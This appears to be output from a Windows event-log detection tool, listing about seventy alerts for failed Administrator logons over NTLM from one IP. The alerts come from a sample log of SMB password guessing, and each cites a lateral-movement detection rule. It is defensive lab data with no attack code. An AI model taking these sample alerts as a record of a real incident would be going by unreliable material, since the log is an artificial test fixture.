| 1356 | 2016-09-20 01:50:37.964 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1357 | 2016-09-20 01:50:38.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1358 | 2016-09-20 01:50:38.048 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1359 | 2016-09-20 01:50:38.093 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1360 | 2016-09-20 01:50:38.129 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1361 | 2016-09-20 01:50:38.174 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1362 | 2016-09-20 01:50:38.216 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1363 | 2016-09-20 01:50:38.254 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1364 | 2016-09-20 01:50:38.296 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1365 | 2016-09-20 01:50:38.335 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1366 | 2016-09-20 01:50:38.380 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1367 | 2016-09-20 01:50:38.416 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1368 | 2016-09-20 01:50:38.465 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1369 | 2016-09-20 01:50:38.510 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1370 | 2016-09-20 01:50:38.544 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1371 | 2016-09-20 01:50:38.580 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1372 | 2016-09-20 01:50:38.628 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1373 | 2016-09-20 01:50:38.665 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1374 | 2016-09-20 01:50:38.713 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1375 | 2016-09-20 01:50:38.756 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1376 | 2016-09-20 01:50:38.801 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1377 | 2016-09-20 01:50:38.894 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1378 | 2016-09-20 01:50:38.940 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1379 | 2016-09-20 01:50:38.972 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1380 | 2016-09-20 01:50:39.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1381 | 2016-09-20 01:50:39.052 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1382 | 2016-09-20 01:50:39.092 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1383 | 2016-09-20 01:50:39.132 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1384 | 2016-09-20 01:50:39.168 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1385 | 2016-09-20 01:50:39.208 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1386 | 2016-09-20 01:50:39.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1387 | 2016-09-20 01:50:39.288 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1388 | 2016-09-20 01:50:39.329 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1389 | 2016-09-20 01:50:39.371 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1390 | 2016-09-20 01:50:39.404 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1391 | 2016-09-20 01:50:39.437 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1392 | 2016-09-20 01:50:39.476 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1393 | 2016-09-20 01:50:39.515 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1394 | 2016-09-20 01:50:39.560 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1395 | 2016-09-20 01:50:39.599 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1396 | 2016-09-20 01:50:39.644 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1397 | 2016-09-20 01:50:39.681 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1398 | 2016-09-20 01:50:39.724 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1399 | 2016-09-20 01:50:39.760 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1400 | 2016-09-20 01:50:39.796 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1401 | 2016-09-20 01:50:39.835 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1402 | 2016-09-20 01:50:39.876 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1403 | 2016-09-20 01:50:39.921 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1404 | 2016-09-20 01:50:39.977 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1405 | 2016-09-20 01:50:40.016 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1406 | 2016-09-20 01:50:40.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1407 | 2016-09-20 01:50:40.088 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1408 | 2016-09-20 01:50:40.129 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1409 | 2016-09-20 01:50:40.168 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1410 | 2016-09-20 01:50:40.212 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1411 | 2016-09-20 01:50:40.254 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1412 | 2016-09-20 01:50:40.302 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1413 | 2016-09-20 01:50:40.348 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1414 | 2016-09-20 01:50:40.396 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1415 | 2016-09-20 01:50:40.437 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1416 | 2016-09-20 01:50:40.488 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1417 | 2016-09-20 01:50:40.528 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1418 | 2016-09-20 01:50:40.581 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1419 | 2016-09-20 01:50:40.627 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1420 | 2016-09-20 01:50:40.660 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1421 | 2016-09-20 01:50:40.700 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1422 | 2016-09-20 01:50:40.742 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1423 | 2016-09-20 01:50:40.795 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1424 | 2016-09-20 01:50:40.853 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1425 | 2016-09-20 01:50:40.918 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
